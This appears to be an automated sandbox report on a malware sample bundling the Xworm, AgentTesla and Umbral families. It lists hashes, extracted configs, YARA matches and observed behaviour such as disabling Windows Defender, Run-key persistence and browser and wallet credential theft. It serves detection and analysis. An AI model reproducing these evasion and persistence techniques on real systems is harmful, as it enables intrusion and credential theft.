agenttesla | 685b97041f1aa3e082b9816c798c7b9adeceb630ca63634035cf4fc4cbcc4cab

Analysis

max time kernel
300s
max time network
285s
platform
windows10-2004_x64
resource
win10v2004-20240704-uk
resource tags

arch:x64arch:x86image:win10v2004-20240704-uklocale:uk-uaos:windows10-2004-x64systemwindows
submitted
21-07-2024 17:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Xworm-V5.6/Xworm 5.6.exe
Size

31.5MB
MD5

034f44acd00471fc4a78f212c40c0fe0
SHA1

a59dfec703be202f3981a2de64f7674baf030648
SHA256

f4b8369ca881ac2fc254a79bc8b42dbed81019ac2a518b40eb2b6cd8e22cf30f
SHA512

37d6ffb0c6a2de1261f269e61bfc0905d4f49c68a34535d70b677dd660d6845e82eae5bed167e52c52f5c9b04e4d281b9693cb8b62c7311d2ac1cfddb00c81be
SSDEEP

393216:vuyIhhkRka4i8EkZQVBl86ODlHTE9Nj+CEDJKRW3I1KpnP2elMOdN6:2yshkqNhQVj86OpgeCEDJKRWPpB4

Score

10^/10

agenttesla umbral xworm evasion execution keylogger persistence pyinstaller rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

127.0.0.1:43101

Attributes

Install_directory
%Public%
install_file
BSOD.exe

Extracted

Family

xworm

Version

5.0

127.0.0.1:7000

Mutex

0caEF7F8CykudCG4

Attributes

Install_directory
%AppData%
install_file
XClient.exe

aes.plain

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral18/memory/2976-512-0x0000000001490000-0x000000000149E000-memory.dmp	disable_win_def

Detect Umbral payload 3 IoCs

resource	yara_rule
behavioral18/files/0x00080000000234c3-23.dat	family_umbral
behavioral18/memory/4784-65-0x0000026381F20000-0x0000026381F60000-memory.dmp	family_umbral
behavioral18/memory/2000-123-0x0000000000400000-0x000000000237D000-memory.dmp	family_umbral

Detect Xworm Payload 3 IoCs

resource	yara_rule
behavioral18/files/0x00070000000236c1-117.dat	family_xworm
behavioral18/memory/3224-124-0x0000000000890000-0x00000000008AA000-memory.dmp	family_xworm
behavioral18/memory/2976-447-0x0000000000D80000-0x0000000000D90000-memory.dmp	family_xworm

Modifies Windows Defender Real-time Protection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	powershell.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2976 created 4512	2976	XClient.exe	197

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

AgentTesla payload 1 IoCs

resource	yara_rule
behavioral18/memory/4612-261-0x000001E74D200000-0x000001E74D3F4000-memory.dmp	family_agenttesla

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3924	powershell.exe
4340	powershell.exe
2396	powershell.exe
2636	powershell.exe
1900	powershell.exe
1876	powershell.exe
2192	powershell.exe
3740	powershell.exe
3332	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation	Xworm 5.6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation	XWorm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation	XClient.exe

Drops startup file 5 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe	creal.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BSOD.lnk	XWorm.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BSOD.lnk	XWorm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	XClient.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	XClient.exe

Executes dropped EXE 15 IoCs

pid	Process
4612	Xworm.exe
2432	creal.exe
4784	Umbral.exe
3224	XWorm.exe
3800	XWorm.exe
4136	creal.exe
3380	BSOD.exe
2792	BSOD.exe
2976	XClient.exe
4968	BSOD.exe
2940	XClient.exe
924	BSOD.exe
4876	XClient.exe
3416	BSOD.exe
4544	XClient.exe

Loads dropped DLL 43 IoCs

pid	Process
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe
4136	creal.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BSOD = "C:\\Users\\Public\\BSOD.exe"	XWorm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe"	XClient.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 26 IoCs

Web Service

T1102

flow	ioc
76	discord.com
81	discord.com
97	discord.com
107	discord.com
71	discord.com
66	discord.com
90	discord.com
102	discord.com
106	discord.com
83	discord.com
88	discord.com
103	discord.com
69	discord.com
87	discord.com
92	discord.com
105	discord.com
44	discord.com
79	discord.com
98	discord.com
104	discord.com
45	discord.com
91	discord.com
95	discord.com
100	discord.com
59	discord.com
101	discord.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
25	ip-api.com
26	api.ipify.org
28	api.ipify.org
126	ip-api.com

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\XWorm.exe	Xworm 5.6.exe

Launches sc.exe 3 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4964	sc.exe
4236	sc.exe
1212	sc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral18/files/0x0018000000023275-16.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1676	wmic.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
4724	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Xworm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Xworm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	Xworm.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe

Modifies registry class 55 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	Xworm.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Xworm.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	Xworm.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"	Xworm.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Xworm.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	Xworm.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	Xworm.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff	Xworm.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	Xworm.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"	Xworm.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2"	Xworm.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Xworm.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Xworm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Xworm.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}	Xworm.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"	Xworm.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1"	Xworm.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff	Xworm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Xworm.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	Xworm.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	Xworm.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	Xworm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	Xworm.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Xworm.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	Xworm.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Xworm.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	Xworm.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	Xworm.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Xworm.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	Xworm.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	Xworm.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Xworm.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	Xworm.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	Xworm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Xworm.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Xworm.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1"	Xworm.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe11000000a39f797c2fceda01c02f1ff443ceda01289221f443ceda0114000000	Xworm.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	Xworm.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000	Xworm.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Xworm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents"	Xworm.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Xworm.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Xworm.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Xworm.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257"	Xworm.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	Xworm.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	Xworm.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Xworm.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0"	Xworm.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	Xworm.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Xworm.exe
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings	Xworm.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Xworm.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Xworm.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
804	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1812	schtasks.exe
1212	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4784	Umbral.exe
2636	powershell.exe
2636	powershell.exe
2636	powershell.exe
1712	powershell.exe
1712	powershell.exe
1712	powershell.exe
1484	powershell.exe
1484	powershell.exe
1484	powershell.exe
3788	powershell.exe
3788	powershell.exe
3788	powershell.exe
4364	powershell.exe
4364	powershell.exe
4364	powershell.exe
1900	powershell.exe
1900	powershell.exe
1900	powershell.exe
3924	powershell.exe
3924	powershell.exe
3924	powershell.exe
3740	powershell.exe
3740	powershell.exe
3740	powershell.exe
4340	powershell.exe
4340	powershell.exe
4340	powershell.exe
3224	XWorm.exe
3224	XWorm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
4612	Xworm.exe
3332	powershell.exe
3332	powershell.exe
1876	powershell.exe
1876	powershell.exe
1876	powershell.exe
2396	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4612	Xworm.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3224	XWorm.exe
Token: SeDebugPrivilege	3800	XWorm.exe
Token: SeDebugPrivilege	4784	Umbral.exe
Token: SeDebugPrivilege	4724	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2492	wmic.exe
Token: SeSecurityPrivilege	2492	wmic.exe
Token: SeTakeOwnershipPrivilege	2492	wmic.exe
Token: SeLoadDriverPrivilege	2492	wmic.exe
Token: SeSystemProfilePrivilege	2492	wmic.exe
Token: SeSystemtimePrivilege	2492	wmic.exe
Token: SeProfSingleProcessPrivilege	2492	wmic.exe
Token: SeIncBasePriorityPrivilege	2492	wmic.exe
Token: SeCreatePagefilePrivilege	2492	wmic.exe
Token: SeBackupPrivilege	2492	wmic.exe
Token: SeRestorePrivilege	2492	wmic.exe
Token: SeShutdownPrivilege	2492	wmic.exe
Token: SeDebugPrivilege	2492	wmic.exe
